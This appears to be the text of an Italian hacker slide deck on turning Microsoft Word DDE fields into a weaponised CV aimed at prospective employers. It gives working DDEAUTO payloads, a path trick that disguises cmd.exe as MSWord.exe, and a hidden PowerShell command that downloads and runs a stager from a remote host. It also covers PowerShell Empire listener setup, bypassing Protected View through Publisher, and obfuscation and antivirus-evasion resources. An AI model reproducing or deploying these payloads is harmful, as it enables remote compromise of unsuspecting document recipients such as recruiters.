EXPLOITING
MICROSOFT'S
WONTFIX
SUITE OFFICE
Funzionalità avanzate per il vostro curriculum!!1
Microsoft Word
Il migliore software per i vostri curriculum
Microsoft Word
Microsoft Dynamic Data Exchange (DDE)
Niente a che vedere con le macro (troppo facile)
Microsoft Word
Microsoft Dynamic Data Exchange (DDE)
IN BREVE
NA CACATA PER LO SCAMBIO DI DATI FRA APPLICAZIONI
Microsoft Word
Microsoft Dynamic Data Exchange (DDE)
SINTASSI TIPICA:
{ DDEAUTO Excel "lavori.xlsx" soldi }
DDETYPE APP "FILE" "CAMPO"
Microsoft Word
Microsoft Dynamic Data Exchange (DDE)
SINTASSI CHE CI PIACE:
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
COSA SUCCEDE SE USIAMO QUESTA DDE? PROVIAMOLO INSIME!!
Microsoft Word
Microsoft Dynamic Data Exchange (DDE)
DUE PROMT PER POSSEDERTI
1
2
Microsoft Word
Microsoft Dynamic Data Exchange (DDE)
IL SECONDO PROMPT NON E' BELLO POSSIAMO FARE DI MEGLIO!
miglioriamo la DDE del nostro curriculum!
Porcodio si vede cmd.exe eh!
Microsoft Word
Microsoft Dynamic Data Exchange (DDE)
LE PATH QUELLE BELLE!
C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\calc.exe
Microsoft Word
Microsoft Dynamic Data Exchange (DDE)
UNA DDE PLAUSIBILE PER IL FUTURO DATORE DI LAVORO
{ DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c calc" "for security reasons"}
BEH ORA CI CHIEDE SE VOGLIAMO FAR PARTIRE MSWORD.EXE PARE LEGITTIMO E LO E'!
Microsoft Word
Microsoft Dynamic Data Exchange (DDE)
SI BELLO, MA CHE ME NE FACCIO DI UNA CALCOLATRICE?
WEAPONIZZIAMOLO COME PIACE DIRE A QUALCUNO!
Microsoft Word
DOCUMENT PAYLOAD!
METASPLOIT? METERPRETER?
nahhhh siete dei vecchi demmerda!!!
Microsoft Word
DOCUMENT PAYLOAD!
DA OGGI PER LA POST EXPLOITATION! SI USA
POWERSHELL EMPIRE!!1
l33tz h4x000000red!!
EMPIRE
CONFIGURIAMO L'ASCOLTATORE (LISTENER)
EMPIRE
CONFIGURIAMO IL LANUNCHER/STAGER/STOCAZZO
Carichiamo il base64 su un file txt, anche pastebin volendo!
EMPIRE
LA NOSTRA DDE! PER IL CURRICULUM"
{DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://iltuosito.tld/fuck.txt');powershell -enc $e # "
"for security reasons" }
Esecuzione tramite powershell dell'launcher: powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://iltuosito.tld/fuck.txt');powershell -enc $e #
WORD + EMPIRE
LES'T DO IT!
WORD + EMPIRE
TIME TO TROLLSPLOIT ALL THE NIGHT!
PROTECTED VIEW
MALEDETTO ROVINA DIVERTIMENTI
SE IL NOSTRO CURRICULIM PASSA DALLA RETE, ALLEGATO EMAIL, DOWNLOAD ,ETC
LE NOSTRE DDE VENGONO BLOCCATE DA PROTECTED VIEW
BYPASS PROTECTED VIEW
HOW?!?!?!!?!?!?
CON IL SOFTWARE OFFICE CHE TUTTI DIMENTICANO MA CHE TUTTI CONOSCONO!
Microsoft compresa.
EMBEDDANDO IL DOCX IN PUBLISHER IL DIVERTIMENTO CONTINUA
publisher non è soggetto a protected view... non so perchè ma questo è molto bello
MICROSOFT PUBLISHER
il miglior software di delivery per il vostro curriculm weaponizzato!
LES'T TRY IT
OBFUSCATOR
https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads
EASY PEASY!
NEXT BEST WONT'FIX?
ILLUSION GAP – ANTIVIRUS BYPASS
https://www.cyberark.com/threat-research-blog/illusion-gap-antivirus-bypass-part-1/
DOMANDE?
Microsoft wont fix Exploiting
By ziopasquale
